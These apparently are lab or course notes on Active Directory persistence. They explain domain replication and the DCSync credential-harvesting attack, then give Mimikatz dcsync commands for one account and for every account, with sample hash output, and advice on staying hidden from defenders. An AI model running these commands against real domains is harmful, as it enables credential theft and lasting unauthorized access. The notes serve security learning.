Credentials
Administrators - Replicating Directory Changes
Domains are often used in multiple regional locations, and having a single Domain Controller would significantly delay any Authentication services in AD. As such, these Organizations make use of multiple DC's, so it is possible to Authenticate with the same Credentials in two different Locations (This Process is Called Domain Replication
).
Each Domain Controller runs a process called the Knowledge Consistency Checker
(KCC). The KCC generates a replication topology for the AD Forest and automatically connects to other Domain Controllers through Remote Procedure Calls (RPC) to Synchronize Information. This includes Updated Information such as the User new Password and new Objects such as when a new User is created.
A popular Attack to perform is a DC Sync Attack
. If we have access to an Account that has Domain Replication Permissions, we can stage a DC Sync Attack to Harvest Credentials from a DC.
Not All Credentials Are Created Equal
If we only have Privileged Credentials, it is safe to say as soon as the Blue Team discovers us, they will Rotate those Accounts, and we can potentially lose our Access.
- The goal then is to persist with Near-Privileged Credentials:
- Credentials that have
Local Administrator
rights on Several Machines: Usually, organizations have Group's with Local Admin rights on almost all Computers. These Groups are typically divided into one for Workstations and one for Servers. - Service Accounts that have
Delegation Permissions
: With these accounts, we would be able to force Golden and Silver Tickets to perform Kerberos Delegation Attacks. - Accounts used for Privileged AD Services: If we compromise Accounts of Privileged Services such as Exchange, Windows Server Update Services (WSUS), or System Center Configuration Manager (SCCM), we could leverage AD Exploitation to once again gain a Privileged Foothold.
- Credentials that have
DCSync
We can use Mimikatz
to Harvest these Credentials. [Domain Administrator Credentials are Required]
- Mimikatz
- Output
:: Performing a DC Sync of a Single Account [Our own for Example]
lsadump::dcsync /domain:za.adobe.loc /user:<Low-Privilege AD Username>
[DC] 'za.adobe.loc' Will be the Domain
[DC] 'PCDC.za.adobe.loc' Will be the DC Server
[DC] '<Low-Privilege AD Username>' Will be the User Account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : <Low-Privilege AD Username>
** SAM ACCOUNT **
SAM Username : <Low-Privilege AD Username>
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/25/2022 7:30:21 PM
Object Security ID : S-1-5-21-3885271727-2693558621-2658995185-1429
Object Relative ID : 1429
Credentials:
Hash NTLM: fbdcd5041c96ddbd82224270b57f11fc
ntlm- 0: fbdcd5041c96ddbd82224270b57f11fc
lm - 0: 0fd2685aa18c78bd265d02bdec203b04
[...]
* Primary:WDigest *
01 991d45386dd3561e0c5529d3605f96e6
02 d5d6f25b233c87b289706d7b423f1145
[...]
:: Performing a DC Sync of a Every Account
:: Logging must be Enabled for this Task
log <Username>_dcdump.txt
:: Instead of Specifying the Username the Flag [/all] us Used
:: This Output will go into a File in your Current Directory
lsadump::dcsync /domain:za.adobe.loc /all